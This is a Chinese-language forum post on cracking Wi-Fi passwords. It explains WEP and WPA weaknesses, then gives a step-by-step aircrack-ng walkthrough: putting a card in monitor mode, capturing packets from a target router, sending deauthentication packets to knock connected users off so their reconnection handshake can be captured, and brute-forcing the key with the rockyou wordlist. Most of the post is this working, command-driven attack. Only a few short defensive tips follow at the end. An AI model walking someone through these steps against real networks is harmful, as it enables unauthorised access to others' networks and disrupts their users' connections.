电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1427 人浏览分享

无线局域网攻防之Wi-Fi破解

[复制链接]
1427 0
本帖最后由 zhaorong 于 2021-8-4 15:30 编辑

前期准备

kail linunx系统
无线网卡接收器(芯片为3070或者1887L都支持Linux)
字典
下面是我自己比较推荐的两个网卡接收器

QQ截图20210804143054.png

QQ截图20210804143117.png

无线网络加密方式和破解方式简介

1.WEP加密方式及破解

1)wEP加密方式

有线等效保密 协议使用的死RC4,串流加密技术保证机密性 并使用CRC-32校验和保证资料的正确性 包含开放式系统认
证和共有健认证。不过随着时代的发展,wep加密方式日渐淘汰,因为这种加密方式非常容易破解安全性不高 现在只有
一小部分使用这种加密方式加密无线网络。

2)wEP漏洞及破解

(1)802.2头信息和简单RC4流密码算法。导致攻击者在有客户端并有大量有效通信时可以分析出wEP的密码
(2)重复使用。导致攻击者在游客户端少量 通信或者没用通信时 可以使用ARP重放的方法获得大量有效的数据。
(3)无身份验证机制,使用线性函数CRC- 32进行完整性校验。导致攻击者能使用虚连接和AP建立伪连接,进而获得×oR文件
使用线性函数CRC-32进行完整性校验 导致攻击者能用×oR文件伪造一个ARP的包,然后依靠这个包去捕获大量有效数据。

破解wEP加密的无线信号依赖两个因素:

1)信号强度;

2)是否有在线客户端。通过抓包 注入 然 后获取密码,只要有这类信号就是百分之百可以破解的。

2.WPA加密方式

现在大部分的无线网络都是使用WPA方式来加密的 这种加密方式安全性高。WPA为Wi-Fi网络安全存取有
WPA和WPA2两个标准 是基于有线等效加密方式中几个严重的弱点而产生的。WPA加密方式目前有四种
认证:WPA、WPA-PSK、WPA2、WPA2-PSK。

wPA加密流程如下:

(1)无线AP定期发送beacon数据包,使无线终端更新自己的无线网络列表。
(2)无线终端在每个信道(1-13)广播Probe Request (非隐藏类型的wi"含ESSlD隐藏类型的wi"不含ESSlD)。
(3)每个信道的AP回应,Probe Response,包含ESSlD及RSN信息。
(4)无线终端给目标AP发送AUTH包。AUTH认证类型有两种:0为开放式1为共享式(wPA/wPA2必须是开放式)。
(5)AP回应网卡AUTH包。
(6)无线终端向AP发送关联请求包Association Request数据包。
(7)AP向无线终端发送关联响应包Association Request数据包。
(8)EAPoL四次握手进行认证(握手包是破解的关键)。
(9)完成认证可以上网。

2)wPA破解
wPA的wi"密码破解分两种方法:抓包和跑Pin码。
(1)抓包破解。wi"信号是加密的,登录无线路由器,就要向路由器发送一个请求请求和无线路由器建立连接,这个请求就是
一个包,名叫握手包,这个包里面包含了发送过去的一个密码,但是这个密码是加密的。抓包破解成
功与否取决于以下四个方面:信号强度 是否有客户端在线 跑包的机器是否足够强大 字典是否好用等等。
(2)跑Pin码破解。wPS(QSS 或 AoSS) 功能是wi"保护设置的英文缩写。对于一般用户,wPS提供了一种相当简便的
加密方法通过该功能,不仅可将具有wPS功能的wi"设备和无线路由器进行快速互连,还会随机产生一个八位数字的
字符串作为个人识别号码(Pin)进行加密操作。省去了客户端需要连入无线网络时,必须手动添加网络名称 SSlD及
输入冗长的无线加密密码的烦琐过程。

实战——Aircrack破解wifi

我们使用的是kali自带的一个工具模块 windows也可以安装

Aircrack-ng是一个包含了多款工具的套装 我们需要使用其中几个模块
  1. airmon-ng
  2.   airodump-ng
  3.   aireplay-ng
  4.   aircrack-ng
复制代码

测试分为六个步骤
准备
探测
抓包
攻击
字典
破解

1.准备

我们首先打开kali 连接我们的无线接收器

选择连接到kali系统

QQ截图20210804151621.png

我们首先看下kali的无线网卡状态 查看wlan0是否开启

9998.png

如果它连接了其他WiFi,那wlan0就会有IP地址。没有就不在连接状态。我们必须保证它没有连接wifi

我们查看网卡状态
  1. iwconfig
复制代码

扩展;iwconfig和ifconfig
iwconfig:这是开发板上的一块物理网卡和一个wifi模块。我们可以看到IP信息 网卡地址等等。
这个命令还常用来设置网络信息
iwconfig:仅仅和无线网络相关。用来设置参数等。

51809.png

可以看到wlan0是处于没有激活的状态

我们需要激活无线网卡到monitor即监听模式下
  1. airmon-ng start wlan0
复制代码

9997.png

我们再次查看,发现网卡以改变为wlan0mon,说明激活成功

9996.png

2.探测

利用无线网卡接收器搜索周围WiFi信息
  1. airodump-ng wlan0mon
复制代码

9992.png

ESSID是wifi名字
BSSID是wifi的mac地址
ENC是加密方式
CH是工作频道
PWR 是信号强度(绝对值越小 信号越强)
Data 是路由器的在线数据吞吐量 数值越大 数值上传量越大
我们需要记住的是自己的mac地址 要攻击者wifi的mac地址以及要攻击者的工作频道
qq是退出 不要强制退出 不然可能漏包

3.抓包

我们得到以上信息后 利用airodump-ng进行抓包
  1. sudo airodump-ng --ivs --bssid MAC地址 -w baixi -c 4 wlan0mon
  2. --bssid 后面是路由器mac地址
  3. -w  是写入到文件longas中,后面跟的是文件名字
  4.     (虽然我们保存的文件名是baixi,但保存下来的名字是baixi-01.ivs)
  5. -c   后面的数字是要破解wifi的频道
  6. --ivs 是只抓取可用于破解的IVS数据报文
复制代码

9991.png

STATION是本地连接用户 我们需要断开他们  让他们进行重新连接

这里我们需要设备与路由传输数据才可以

4.攻击

谨记:需要开新的窗口

原理:为了破解所需要的WPA2握手验证的完整数据包 会发一个”Deauth“数据包 断开对方的网络 让对方再次连接
重新抓包 对方自动连接会携带了key 所以攻击·的·时候必须有人已经连接这个wifi
我们需要开一个新的shell
  1. aireplay-ng -0 1 -a 24:00:FA:AB:C5:68 -c E8:65:D4:A2:0E:71 wlan0mon
  2. -0采用的deauth攻击模式,后面是攻击次数
  3. -a 后面是要攻击wifi的mac地址
  4. -c 后面是已连接wifi的mac地址
复制代码

9990.png

当出现右上角出现WPA handshake的时候说明抓包完成 获取到了wifi包的加密秘钥 举一个成功的例子

8999.png

5.字典

可以使用kali自带的秘钥字典
  1. cd /usr/share/wordlists/
  2. sudo gzip -d rockyou.txt.gz
复制代码

8998.png

或者使用本地的密码本

亦或者收集信息自动生成字典crunch

6.破解

ivs数据包爆破
  1. aircrack-ng -w password.txt baixi-01.ivs
复制代码

8997.png

破解速度与使用的电脑性能有关 当中间出现

KEY FOUND!

后面括号就是该wifi的密码

防护建议

设置复杂且长的密码

不要使用WEP加密方式

加强个人信息保护 不给其收集字典的信息

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.